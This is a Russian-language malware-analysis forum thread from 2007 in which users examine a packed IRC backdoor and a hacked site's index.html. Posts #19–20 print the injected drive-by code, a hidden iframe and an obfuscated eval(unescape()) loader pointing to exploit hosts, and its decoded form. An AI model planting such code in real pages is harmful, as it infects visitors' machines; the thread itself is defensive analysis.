Сейчас на форуме: johnniewalker, Kybyx, testrev1337, bedop66938, vsv1 (+7 невидимых)

 eXeL@B —› Крэки, обсуждения —› Исследование вирусов
<< 1 ... 18 . 19 . 20 . 21 . 22 . 23 . 24 . 25 . 26 . 27 . 28 ... 47 . 48 . >>
Посл.ответ Сообщение

Ранг: -0.2 (гость)
Активность: 0=0
Статус: Участник

Создано: 13 октября 2006 23:15 · Поправил: Модератор
· Личное сообщение · #1

В этом топике происходит исследование малвари: вирусни, троянов, как их вычистить и тд.



Ранг: 159.1 (ветеран), 7thx
Активность: 0.130
Статус: Участник

Создано: 20 ноября 2007 18:47 · Поправил: tempread
· Личное сообщение · #2

[HEX]
Так через апач к скрипту и не доберешься...
Но в логах апача с ошибочными запросами нет имени php скрипта :-

А обфусцированные index.html обновляют по нескольку раз в день (наверное к ботику отношения не имеет)




Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 20 ноября 2007 22:44
· Личное сообщение · #3

tempread
Так небось в html странице какой нить ифрейм на сплойт ведет. Если сам не можешь разобрать страницу, то упакую и залей, а мы глянем.

-----
Computer Security Laboratory





Ранг: 104.9 (ветеран), 46thx
Активность: 0.040.02
Статус: Участник

Создано: 21 ноября 2007 00:37 · Поправил: ManHunter
· Личное сообщение · #4

tempread пишет:
улыбнул коментарий внутри: This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.


[HEX] пишет:
Ну раз такой коммент внутри файла, то на 90% что юзают фриварный продукт по шифрованию скриптов.


TrueBug PHP Encoder. Его каммент. Не очень халявный, но снимается действительно за 5 минут. Ломается впрочем тоже.




Ранг: 282.8 (наставник), 24thx
Активность: 0.260
Статус: Участник
win32.org.ru

Создано: 22 ноября 2007 09:03
· Личное сообщение · #5

Посмотрите файл rapidshare.com/files/71414726/kcar.osikcigam.zip
кто может сказать, вредоносный он или нет?

Заранее спасибо.

-----
may all your PUSHes be POPed!





Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 22 ноября 2007 09:48
· Личное сообщение · #6

Guru_eXe
Файл явно подозрительный Несмотря даже внутрености запускать яб не стал такое, так как весит 600 кило, а не одного ресурса в файле нет. Да и вирустотал тоже чето не совсем уж радостно красными цветами сигнализирует www.virustotal.com/resultado.html?6ac8ac29093bacfe7b930d844b7e2829

-----
Computer Security Laboratory





Ранг: 282.8 (наставник), 24thx
Активность: 0.260
Статус: Участник
win32.org.ru

Создано: 22 ноября 2007 10:10
· Личное сообщение · #7

[HEX] пишет:
запускать яб не стал такое

яб тоже не стал, но за компьютером сиделю любопытные люди... теперь обновляю весь защитный софт, нужно както избавиться от этой заразы, если это вирь конечно. Это не точно, но вроде после запуска этого файла каспер перестал обновляться, пишет, - проверьте подключение, явно чтото нездоровое, поставил каспер поновее, просканил тот файл, каспер промолчал.

-----
may all your PUSHes be POPed!





Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 22 ноября 2007 10:42
· Личное сообщение · #8

Guru_eXe
Попробуй под виртуалкой потрейсить малец. В крайнем случае сдампи запущенную прогу и посмотри че там внутри.

-----
Computer Security Laboratory





Ранг: 282.8 (наставник), 24thx
Активность: 0.260
Статус: Участник
win32.org.ru

Создано: 22 ноября 2007 11:22 · Поправил: Guru_eXe
· Личное сообщение · #9

[HEX] пишет:
В крайнем случае сдампи запущенную прогу и посмотри че там внутри.

Каспер пишет, что там армадилло. Под виртуалкой нормально не загрузилось, говорит вырубите отладчик (у меня там драйверстудия установлена, хотя не стартует сама), дампнул, если такк можно сказать.. загнал в вирустотал:
Результат: 5/32 (15.63%)
www.virustotal.com/ru/resultado.html?9fd2013b9deec9896227934ea10a14e4
AntiVir передумал и Панда перестала считать его подозрительным.

Дамп дрвеб идентифицировал как BackDoor.IRC.Evil. а на сам процесс никак не реагирует.

add:
по всем характеристикам я подхватил вот это:
forum.kaspersky.com/lofiversion/index.php/t22161.html
у меня также вылазит сообщение о файле ntndis, за одним исключением - там парень пишет, что вирус дабавили в базу, а у меня каспер на этот файл молчит, возможно какято новая модификация, так как архив был стянут с битторрент сети совсем недавно.

-----
may all your PUSHes be POPed!




Ранг: 309.8 (мудрец), 21thx
Активность: 0.170
Статус: Участник

Создано: 22 ноября 2007 12:21
· Личное сообщение · #10

Велком ту ботнет

-----
Shalom ebanats!




Ранг: 66.8 (постоянный)
Активность: 0.030
Статус: Участник

Создано: 22 ноября 2007 12:26
· Личное сообщение · #11

Guru_eXe
судя по логу analysis.seclab.tuwien.ac.at/result.php?taskid=41cc8c1571208954a10a4018c36628f4&refresh=1
очень похоже на Illusion DDoS Bot




Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 22 ноября 2007 12:35
· Личное сообщение · #12

UsAr
Угу если судить по логу, то так же напоминает и руткит W32/Forbot-GI www.greatis.com/appdata/d/SysDir/d/drivers_ntndis.sys.htm

-----
Computer Security Laboratory





Ранг: 282.8 (наставник), 24thx
Активность: 0.260
Статус: Участник
win32.org.ru

Создано: 22 ноября 2007 12:39 · Поправил: Guru_eXe
· Личное сообщение · #13

UsAr, ага, тотже самый ntndis упоминается и в реестре он у меня прописался с такимже путем, только вот операционки у меня на диске C:\ нету =] Самолично я файлы ntndis.exe и ntndis.sys не удалял, мб каспер пошевелился.

SLV пишет:
Велком ту ботнет

надеюсь, что, - прощай навсегда.

add:
надеюсь, что отсутствие этих файлов является подтверждением того, что вируса нет.

-----
may all your PUSHes be POPed!




Ранг: 103.1 (ветеран), 3thx
Активность: 0.070.01
Статус: Участник

Создано: 22 ноября 2007 13:05 · Поправил: Styx
· Личное сообщение · #14

Guru_eXe

Прожка дропает драйвер, который ставит хуки в SDT.
AVZ+RKU тебя спасут (:

Основная засада для аверов, это то что исходный файл пакован армадиллой.
Сиська известна как BackDoor.IRC.Evil

-----
Crack your mind, save the planet




Ранг: 74.4 (постоянный)
Активность: 0.050
Статус: Участник

Создано: 22 ноября 2007 20:39
· Личное сообщение · #15

Styx пишет:
Основная засада для аверов, это то что исходный файл пакован армадиллой.
Сиська известна как BackDoor.IRC.Evil

Никакой засады нету, возьмут сигнатуру по криптованому коду и все в ажуре, 5касперский так всевремя делает. или спалят драйвер, а без дрова, толку от бэкдока почти нету.



Ранг: 330.4 (мудрец), 334thx
Активность: 0.160.17
Статус: Участник
ILSpector Team

Создано: 23 ноября 2007 11:31 · Поправил: Medsft
· Личное сообщение · #16

Черт знает что но льется с xstuff.bz

5d1e_23.11.2007_CRACKLAB.rU.tgz - msntyylh.rar

пароль: vir



Ранг: 103.1 (ветеран), 3thx
Активность: 0.070.01
Статус: Участник

Создано: 23 ноября 2007 11:35 · Поправил: Styx
· Личное сообщение · #17

WoLFeR

Нифига се не засада...
Сигнатурный поиск отстой. Насмотрелся я уже на такой "ажур", когда на всякие пакеры понаделают маски... Потом еще у авера базы охренительных размеров и он педалит все, как стоп-кран.

Этот троян давно известен, только вот ему жизнь продлили. Не хочу сказать, что в мире есть, что-то идеальное, но к этому, имхо, надо стремиться (:

-----
Crack your mind, save the planet




Ранг: 103.1 (ветеран), 3thx
Активность: 0.070.01
Статус: Участник

Создано: 23 ноября 2007 12:02
· Личное сообщение · #18

Medsft

Наверное чего-то не хватает в этом файлике. Файл архива 603 байта. Падает с ошибкой, в памяти нули.

-----
Crack your mind, save the planet




Ранг: 330.4 (мудрец), 334thx
Активность: 0.160.17
Статус: Участник
ILSpector Team

Создано: 23 ноября 2007 13:05
· Личное сообщение · #19

Тогда вот так эта хрень дописывается к index.html
разберешься
<iframe src="http://xstuff.biz/tdsko-xyz/out=1194991778" width=1 height=1 frameborder=0><!-- o --><!-- c --><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%2 7%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c %69%66%72%61%6d%65%20%6e%61%6d%65%3d%31%37%64%64%64%34%63%37%34%34%35% 33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%78%2d%76%69%63%74%6f%72%7 9%2e%72%75%2f%66%6f%72%75%6d%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28 %4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%32%30%31%31%30%29%2b%27% 32%62%31%65%31%62%32%32%5c%27%20%77%69%64%74%68%3d%37%35%39%20%68%65%6 9%67%68%74%3d%32%39%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79 %3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>



Ранг: 34.1 (посетитель)
Активность: 0.020
Статус: Участник

Создано: 23 ноября 2007 13:20
· Личное сообщение · #20

window.status='Done';document.write('<iframe name=17ddd4c74453 src='http://x-victory.ru/forum?'+Math.round(Math.random()*220110)+'2b1 e1b22' width=759 height=290 style='display: none'></iframe>')

собстно не похоже на впаривания троя.
P.S. xstuff.bz у меня недосупен.



Ранг: 330.4 (мудрец), 334thx
Активность: 0.160.17
Статус: Участник
ILSpector Team

Создано: 23 ноября 2007 13:37
· Личное сообщение · #21

вот это по моему от него

95a4_23.11.2007_CRACKLAB.rU.tgz - vir.txt




Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 23 ноября 2007 14:37 · Поправил: [HEX]
· Личное сообщение · #22

Shad0vv
Еще как похоже!!! Ифрейм смотрящий на х-виктори ведет как раз таки на сплоит под Оперу который стартует говно ихнее. Ну а дальше по старому сценарию.

-----
Computer Security Laboratory




Ранг: 103.1 (ветеран), 3thx
Активность: 0.070.01
Статус: Участник

Создано: 23 ноября 2007 14:50 · Поправил: Styx
· Личное сообщение · #23

Medsft

Известен как троян-даунлоадер.агент
Только это реально ни о чем не говорит, словом Агент обзывают всё на свете (:

Файлик тоже битый.

-----
Crack your mind, save the planet





Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 23 ноября 2007 16:00 · Поправил: [HEX]
· Личное сообщение · #24

Styx
Запускал чтоли? ;) Может специально покорежен файлик чтобы аверы спотыкались.

-----
Computer Security Laboratory




Ранг: 74.4 (постоянный)
Активность: 0.050
Статус: Участник

Создано: 23 ноября 2007 16:16
· Личное сообщение · #25

Styx пишет:
Нифига се не засада...
Сигнатурный поиск отстой. Насмотрелся я уже на такой "ажур", когда на всякие пакеры понаделают маски... Потом еще у авера базы охренительных размеров и он педалит все, как стоп-кран.

Этот троян давно известен, только вот ему жизнь продлили. Не хочу сказать, что в мире есть, что-то идеальное, но к этому, имхо, надо стремиться (:


Ну и иди доказывай свое мнение про сигнатурный поиск в разные конторы.
Я не говорю что сигнатурный поиск рулед, я говрю как работают конторы, и для них никакого гемора для детекта этого троя не будет ни на минуту. Т.к. они одну копию распростроняют, и внесли одну сингнатуру и вся сеть легла.

Вот терь и думай нах напрягатся больше. А твое мнение по поводу "ацтой, неацтой" никого не _бед.



Ранг: 103.1 (ветеран), 3thx
Активность: 0.070.01
Статус: Участник

Создано: 23 ноября 2007 16:48 · Поправил: Styx
· Личное сообщение · #26

[HEX]
Там с заголовком скорее всего что-то. Пытался запускать (: Винда грит что-то это не прожка, может она 64-х битная.

WoLFeR
Я по конторам ходить не стану, мне это не интересно. Я просто хотел сказать, что более менее сложные упаковщики - проблема для антивирусов (как программ). Антивирус в большинстве своем прожка на которой зарабатывают деньги.

-----
Crack your mind, save the planet




Ранг: 330.4 (мудрец), 334thx
Активность: 0.160.17
Статус: Участник
ILSpector Team

Создано: 23 ноября 2007 16:51
· Личное сообщение · #27

<KZ (закодировано) если б все было так просто я б сам их камнями закидал



Ранг: 330.4 (мудрец), 334thx
Активность: 0.160.17
Статус: Участник
ILSpector Team

Создано: 23 ноября 2007 17:05
· Личное сообщение · #28

попробуйте еще вот это внутри почти тоже самое только на 100 байт длинее и пришло под расширением .php
пароль на архив vir

3449_23.11.2007_CRACKLAB.rU.tgz - VIR.RAR




Ранг: 104.9 (ветеран), 46thx
Активность: 0.040.02
Статус: Участник

Создано: 23 ноября 2007 17:30
· Личное сообщение · #29

Medsft пишет:
попробуйте еще вот это


drweb сразу ругнулся

VIR.TXT - инфицирован Trojan.Packed.156




Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 23 ноября 2007 17:49 · Поправил: [HEX]
· Личное сообщение · #30

Medsft
Гы запускай! analysis.seclab.tuwien.ac.at/result.php?taskid=8361014780a13444956d9f8ccacc4439

Столько сольется всего что потом на всю жизнь хватить анализировать.... хихи

Послание аверам:
Poshel-ka ti na hui drug aver
reva gurd iuh an it ak-lehsoP

-----
Computer Security Laboratory




Ранг: 103.1 (ветеран), 3thx
Активность: 0.070.01
Статус: Участник

Создано: 23 ноября 2007 18:05 · Поправил: Styx
· Личное сообщение · #31

Medsft
Вот исправленый ехе, скорее всего он не докачался:

9098_23.11.2007_CRACKLAB.rU.tgz - vir.rar

мда, опоздал (:
второй vir.exe как раз имеет размер тот что надо

-----
Crack your mind, save the planet



<< 1 ... 18 . 19 . 20 . 21 . 22 . 23 . 24 . 25 . 26 . 27 . 28 ... 47 . 48 . >>
 eXeL@B —› Крэки, обсуждения —› Исследование вирусов
Эта тема закрыта. Ответы больше не принимаются.
   Для печати Для печати